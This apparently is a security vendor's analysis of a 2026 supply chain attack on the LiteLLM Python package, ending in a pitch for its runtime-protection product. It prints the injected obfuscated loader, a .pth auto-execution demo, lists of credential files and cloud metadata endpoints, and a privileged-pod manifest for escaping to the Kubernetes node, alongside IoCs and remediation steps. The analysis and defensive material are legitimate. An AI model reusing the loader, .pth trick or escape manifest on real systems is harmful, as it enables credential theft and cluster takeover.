LiteLLM Supply Chain Attack: How 12 Lines of Code Compromised 95 Million Downloads
On March 24, 2026, TeamPCP published two malicious versions of LiteLLM to PyPI. Within three hours, a credential-stealing payload reached AI infrastructure across 36% of monitored cloud environments.
This Is Not an AI Vulnerability
Before we dive in: this attack has nothing to do with LLM prompt injection, model jailbreaks, or AI safety. It's a software supply chain attack — the same class of threat that hit SolarWinds, Codecov, and ua-parser-js. The target just happens to be AI infrastructure. The vulnerability is in how packages are built, signed, and delivered — not in the models themselves.
What Is LiteLLM?
LiteLLM is a Python library that lets you call 100+ LLM APIs through a single interface. In proxy mode, it becomes a centralized AI gateway handling API keys, load balancing, and spend tracking. It's a transitive dependency in CrewAI, DSPy, MLflow, and LangChain — most teams don't know they run it. A library that handles every API key in your AI stack, installed 95M times per month. A perfect target.
How It Happened
TeamPCP didn't attack LiteLLM directly. Over the preceding month, they compromised two security scanners — Aqua Trivy and Checkmarx KICS — through misconfigured GitHub Actions, stealing CI/CD credentials at each step. Each compromise yielded tokens that unlocked the next target.
The final link: LiteLLM's CI pipeline ran `apt-get install trivy` — without pinning a version. It pulled the already-poisoned Trivy v0.69.4, which harvested the `PYPI_PUBLISH` token — the key to publishing Python packages under the LiteLLM name.
The Injection: Two Techniques in 13 Minutes
Version 1.82.7 (published 10:39 UTC) took the straightforward approach: 12 lines of obfuscated code injected into `litellm/proxy/proxy_server.py` at lines 128–139. The payload used double-base64 encoding — a ~4KB encoded string that decoded to a temp file and executed via `subprocess.run()`. It triggered whenever the proxy module was imported — which happens on every `litellm --proxy` start:
```python
# Lines 128-139 of proxy_server.py (v1.82.7)
import subprocess, sys, base64, tempfile

_enc = "aW1wb3J0IH..."  # double-base64 (~4KB decoded)
_dec = base64.b64decode(base64.b64decode(_enc))
with tempfile.NamedTemporaryFile(suffix='.py', delete=False) as f:
    f.write(_dec)
    f.flush()
subprocess.run([sys.executable, f.name])
```
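Double-base64 is obfuscation, not encryption: stacking the encoding twice defeats single-pass base64 scanners and naive string matching, nothing more. A minimal round-trip, with an illustrative payload string standing in for the attacker's blob:

```python
import base64

# Illustrative stand-in for the attacker's ~4KB blob.
payload = b"print('stage two goes here')"

# Encode twice, as the injected stub's _enc string was.
enc = base64.b64encode(base64.b64encode(payload)).decode()

# Peeling both layers recovers the original source verbatim.
dec = base64.b64decode(base64.b64decode(enc))
assert dec == payload
```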
Version 1.82.8 (published 10:52 UTC — just 13 minutes later) escalated the attack. It kept the proxy_server.py injection but added a far more dangerous mechanism: a litellm_init.pth file included directly in the wheel package.
The .pth Mechanism: Why It's Devastating
Python's .pth files are normally used to extend sys.path, but any line starting with import is executed as code during interpreter initialization — before any user script runs. This means:
- The malware fires on any `python` command — not just LiteLLM imports
- It runs before `if __name__ == "__main__"` — there is no way to guard against it
- The file was correctly declared in the wheel's RECORD file, so `pip install --require-hashes` would have passed — the hash was valid because the malicious content was published with legitimate credentials
- It persists across virtualenv recreation — as long as the package is installed, the .pth executes
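The mechanism is easy to reproduce safely. `site.addsitedir()` runs the same .pth-processing logic the interpreter applies at startup: any line beginning with `import` is exec()'d on the spot. A sketch using a throwaway directory (the file and variable names here are mine):

```python
import os
import site
import tempfile

# A .pth file whose "import" line smuggles arbitrary code, as
# litellm_init.pth did.
d = tempfile.mkdtemp()
with open(os.path.join(d, "demo.pth"), "w") as f:
    f.write("import os; os.environ['PTH_FIRED'] = '1'\n")

# addsitedir() processes .pth files exactly as interpreter startup does:
# the line above is exec()'d the moment the directory is scanned.
site.addsitedir(d)
print(os.environ.get("PTH_FIRED"))  # prints "1"
```

At real startup the trigger is the `site` module itself, so the code runs before any user script — which is why no in-script guard can help.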
A critical bug: the .pth launcher spawned child processes via subprocess.Popen, which started new Python interpreters, which triggered the .pth again — creating an exponential fork bomb that crashed machines within seconds. This "bug in the malware" was likely the single biggest factor in accelerating detection, as affected systems became visibly unstable.
PyPI quarantined both versions at approximately 11:25 UTC — roughly three hours after the first publication. During that window, LiteLLM was averaging 3.4 million downloads per day.
The Payload
Credential Harvester
The first stage performed a comprehensive sweep of the host. It wasn't just reading files — it actively queried APIs to validate and expand the collected credentials:
- SSH — `id_rsa`, `id_ed25519`, `id_ecdsa`, `id_dsa`, `authorized_keys`, `config`, `known_hosts`
- AWS — `~/.aws/credentials`, `~/.aws/config`, IMDSv2 metadata (`169.254.169.254/latest/meta-data/iam/security-credentials/`), ECS task role credentials via `$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI`
- GCP — service account JSON files, application default credentials (`~/.config/gcloud/`), compute metadata tokens
- Azure — managed identity tokens via `169.254.169.254/metadata/identity/oauth2/token`
- Kubernetes — `~/.kube/config`, in-cluster service account tokens at `/var/run/secrets/kubernetes.io/`, enumerated and dumped secrets across all accessible namespaces
- CI/CD — Terraform state files (often contain cloud credentials in plaintext), GitLab CI tokens, Jenkins `credentials.xml`, Travis CI tokens, `.npmrc`, `.pypirc`
- Databases — `.pgpass`, `my.cnf`, Redis/MongoDB connection strings
- Crypto wallets — Bitcoin (`wallet.dat`), Ethereum keystores, Solana keypairs
- Application secrets — every `.env` file reachable from the user's home directory, `.gitconfig`, shell history (`.bash_history`, `.zsh_history`), Slack/Discord webhooks, Stripe API keys, SendGrid tokens
Encryption Pipeline
The exfiltration wasn't naive. Collected data was encrypted using a multi-layer scheme:
- Generate random AES-256-CBC session key + IV
- Derive key material using PBKDF2
- Encrypt the archive with the session key
- Encrypt the session key with a hardcoded 4096-bit RSA public key (only the attacker holds the private key)
- Package as `tpcp.tar.gz` and POST to `models.litellm[.]cloud` with header `X-Filename: tpcp.tar.gz`
This means even if you captured the network traffic, you cannot decrypt the exfiltrated data without the attacker's RSA private key.
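A stdlib-only sketch of that envelope structure; the names are mine, and the XOR and key-reversal stand-ins merely mark where AES-256-CBC encryption and RSA-4096 key wrapping would sit, since neither cipher ships in Python's standard library:

```python
import hashlib
import os

def xor_stub(data: bytes, key: bytes) -> bytes:
    # Placeholder for AES-256-CBC -- NOT real encryption.
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def build_envelope(archive: bytes) -> dict:
    session_key = os.urandom(32)              # fresh AES-256 session key
    iv = os.urandom(16)                       # CBC initialization vector
    # PBKDF2 stretching over the session key, per the reported pipeline
    derived = hashlib.pbkdf2_hmac("sha256", session_key, iv, 100_000)
    ciphertext = xor_stub(archive, derived)   # stand-in for AES-256-CBC
    wrapped_key = session_key[::-1]           # stand-in for RSA-4096 wrap
    # Only the wrapped key travels; without the attacker's RSA private
    # key the session key, and thus the archive, is unrecoverable.
    return {"iv": iv, "key": wrapped_key, "data": ciphertext}

env = build_envelope(b"tpcp.tar.gz contents")
```

The design point is the hybrid envelope: symmetric encryption for bulk data, asymmetric wrapping for the symmetric key, so captured traffic is useless without the attacker-held private key.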
Kubernetes Lateral Movement
If Kubernetes service account tokens were found on the host, the malware escalated from credential theft to active cluster compromise:
- Read cluster secrets across all accessible namespaces via the K8s API
- Enumerated all nodes in the cluster
- For each node, deployed a privileged `alpine:latest` pod named `node-setup-{node_name}` in the `kube-system` namespace
- The pod mounted the host root filesystem at `/host` via a `hostPath` volume
- Inside the pod: `chroot /host` to escape the container, then installed the CanisterWorm backdoor directly on the node's filesystem
Container names alternated between kamikaze and provisioner — the former used for destructive operations, the latter for persistence.
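Reconstructed from the behavior described above, the deployed pod would have looked roughly like this (all field values are illustrative, not recovered from a compromised cluster):

```yaml
apiVersion: v1
kind: Pod
metadata:
  name: node-setup-worker-1      # node-setup-{node_name}
  namespace: kube-system
spec:
  nodeName: worker-1             # pin the pod to the targeted node
  containers:
  - name: provisioner            # alternated with "kamikaze"
    image: alpine:latest
    securityContext:
      privileged: true
    # chroot into the mounted host filesystem, then install the backdoor
    command: ["chroot", "/host", "/bin/sh"]
    volumeMounts:
    - name: host-root
      mountPath: /host
  volumes:
  - name: host-root
    hostPath:
      path: /                    # entire node filesystem
```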
For hosts with Tehran timezone or Farsi language settings, the behavior changed entirely: instead of persisting, the malware deployed a wiper that destroyed Kubernetes cluster data. This targeted destructive capability against Iranian infrastructure suggests geopolitical motivation beyond pure financial gain.
Persistent Backdoor
The final stage ensured long-term access through a systemd user service — requiring no root privileges:
- Wrote persistence script to `~/.config/sysmon/sysmon.py`
- Created a systemd user unit at `~/.config/systemd/user/sysmon.service`, labeled "System Telemetry Service" to blend in with legitimate monitoring
- Initial 300-second sleep before first activation (evades sandbox analysis)
- Polled `checkmarx[.]zone/raw` every ~50 minutes for payload URLs
- Downloaded payloads to `/tmp/pglog`, executed in detached sessions via `setsid`
- Tracked beacon state in `/tmp/.pg_state` to avoid redundant downloads
- Filtered YouTube links as a kill-switch — if the C2 returned a YouTube URL, the payload was skipped (allowing the attacker to "pause" operations)
This persistence survived reboots, pip uninstall litellm, and virtual environment recreation. The only remediation was finding and deleting the sysmon files manually, or rebuilding from a clean image.
When Sonatype researchers attempted to retrieve the C2 payload during analysis, the endpoint returned a link to an English remaster of "Bad Apple!!" — a deliberate troll that also defeated automated sandbox analysis.
Suppression & Impact
When security researchers filed GitHub issue #24512 reporting the compromise, TeamPCP used the stolen maintainer account to close it as "not planned" — making it appear the legitimate maintainers had dismissed the report. The issue was simultaneously flooded with bot comments from accounts matching botnets previously observed during the Trivy disclosure, burying legitimate analysis under noise.
The attack's C2 domain — models.litellm.cloud — was deliberately chosen to mimic legitimate LiteLLM infrastructure, making network-level detection harder for defenders scanning for suspicious domains.
Across the full campaign (Trivy → npm → KICS → LiteLLM), TeamPCP claimed to have "stolen hundreds of gigabytes of data and more than half a million accounts." Over 20,000 repositories were considered potentially vulnerable. LiteLLM itself was present in 36% of monitored cloud environments according to Wiz research.
IoCs & Forensics
| Type | Indicator | Context |
|---|---|---|
| PyPI | litellm==1.82.7 | proxy_server.py injection |
| PyPI | litellm==1.82.8 | + .pth persistence |
| SHA-256 Hashes | | |
| proxy_server.py | a0d229be8efcb2f9135e2ad55ba275b76ddcfeb55fa4370e0a522a5bdee0120b | v1.82.7 |
| litellm_init.pth | 71e35aef03099cd1f2d6446734273025a163597de93912df321ef118bf135238 | v1.82.8 |
| sysmon.py | 6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a | Backdoor |
| Network | | |
| C2 | models.litellm[.]cloud | Exfiltration |
| C2 | checkmarx[.]zone | Backdoor polling |
| IP | 45.148.10.212 | aquasecurtiy[.]org |
| IP | 83.142.209.11 | checkmarx[.]zone |
| Filesystem & K8s | | |
| File | ~/.config/sysmon/sysmon.py | Persistence |
| Systemd | ~/.config/systemd/user/sysmon.service | User service |
| K8s | node-setup-{name} | kube-system pods |
| Archive | tpcp.tar.gz | Exfil bundle |
Detection & Remediation
If you installed LiteLLM between Mar 24 10:39–11:25 UTC → full credential exposure.
- Check version: `pip show litellm | grep Version`
- Find the .pth: `find "$(python -c 'import site;print(site.getsitepackages()[0])')" -name "litellm_init.pth"`
- Check persistence: `ls ~/.config/sysmon/ ~/.config/systemd/user/sysmon.service`
- Audit K8s: `kubectl get pods -n kube-system | grep node-setup`
- Rotate ALL credentials from the affected environment
- Rebuild from a clean image — persistence survives `pip uninstall`
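The checks above can be rolled into one script. This is a hypothetical helper mirroring the shell commands, not an official remediation tool:

```python
import importlib.metadata
import pathlib
import site

COMPROMISED = {"1.82.7", "1.82.8"}

def audit() -> list:
    findings = []
    # 1. Installed version
    try:
        ver = importlib.metadata.version("litellm")
        if ver in COMPROMISED:
            findings.append(f"compromised litellm=={ver}")
    except importlib.metadata.PackageNotFoundError:
        pass
    # 2. Startup payload in any site-packages directory
    for sp in site.getsitepackages() + [site.getusersitepackages()]:
        pth = pathlib.Path(sp) / "litellm_init.pth"
        if pth.exists():
            findings.append(f"startup payload: {pth}")
    # 3. Persistence artifacts in the home directory
    home = pathlib.Path.home()
    for rel in (".config/sysmon/sysmon.py",
                ".config/systemd/user/sysmon.service"):
        if (home / rel).exists():
            findings.append(f"persistence artifact: {home / rel}")
    return findings

print(audit() or "no known IoCs found")
```

A clean result does not prove a clean host: if a compromised version ever ran, rotate credentials and rebuild anyway.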
How Imunify for AI Agents Stops This
Once a package is installed, conventional supply chain tooling stops looking — nothing inspects what the code does at runtime. Imunify for AI Agents fills this gap with kernel-level interception: eBPF hooks, fanotify, and a transparent HTTP proxy.
The Kill Chain — Every Stage Blocked
Instant Discovery
When LiteLLM starts, a kernel-level sched_process_exec hook detects it instantly — PID tracked before the process runs its first instruction. No polling, no delay.
File Read Blocking
Every file LiteLLM opens is intercepted — the process is frozen in the kernel until policy decides. The compromised version's attempt to sweep credentials from .env, SSH keys, and cloud configs is denied on each read. A content scanner with 200+ secret patterns catches credentials even in unexpected file paths.
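Pattern-based secret detection can be illustrated with a few representative rules; these three regexes are examples of the technique, not Imunify's actual rule set:

```python
import re

PATTERNS = {
    "aws_access_key": re.compile(r"AKIA[0-9A-Z]{16}"),
    "private_key": re.compile(
        r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "slack_webhook": re.compile(r"hooks\.slack\.com/services/T[A-Za-z0-9]+"),
}

def scan(text: str) -> list:
    # Return the names of every rule that matches the given content.
    return [name for name, rx in PATTERNS.items() if rx.search(text)]

hits = scan("AWS_ACCESS_KEY_ID=AKIAABCDEFGHIJKLMNOP")
```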
Network Correlation
Cross-event correlation rules catch the exact pattern this attack uses: if LiteLLM (or any tracked process) reads .env files and then attempts an outbound HTTP connection, the connection is automatically blocked — no human decision needed. Unknown destinations require explicit approval via Telegram, Discord, or Web UI before any data leaves the machine.
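The read-then-egress rule can be sketched as a toy correlator (illustrative only: the real engine consumes kernel events, not Python callbacks, and its thresholds are not public):

```python
import collections

WINDOW = 30.0  # seconds between secret read and egress that triggers a block
SECRET_HINTS = (".env", "id_rsa", ".aws/credentials", ".kube/config")

last_secret_read = collections.defaultdict(lambda: float("-inf"))

def on_file_read(pid, path, now):
    # Record the moment a tracked process touches a secret-bearing file.
    if any(hint in path for hint in SECRET_HINTS):
        last_secret_read[pid] = now

def on_connect(pid, dest, now):
    # Deny egress that closely follows a secret read by the same process.
    if now - last_secret_read[pid] <= WINDOW:
        return "BLOCK"
    return "ALLOW"

on_file_read(101, "/app/.env", now=1000.0)
verdict = on_connect(101, "203.0.113.9:443", now=1005.0)  # -> "BLOCK"
```

Keeping the decision per-process and time-bounded is what makes it automatic: an unrelated process connecting out, or the same process connecting long after the read, is unaffected.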
Behavioral Kill
When the compromised LiteLLM triggers a rapid burst of blocked file reads — the exact pattern of a credential harvester scanning the filesystem — Imunify for AI Agents automatically kills the process. No human intervention. The attack dies before it finishes its first sweep.
Conclusion
Supply chain attacks cascade. One misconfigured GitHub Action → credential theft → npm → KICS → PyPI. Incomplete remediation at each step left doors open.
Build-time security is necessary but insufficient. Signatures and hashes don't help when a compromised version is published with valid credentials. Runtime interception watches what code does, not where it came from.
Twelve lines. Three hours. Ninety-five million downloads. The next attack won't look like this one — but the syscalls will be the same.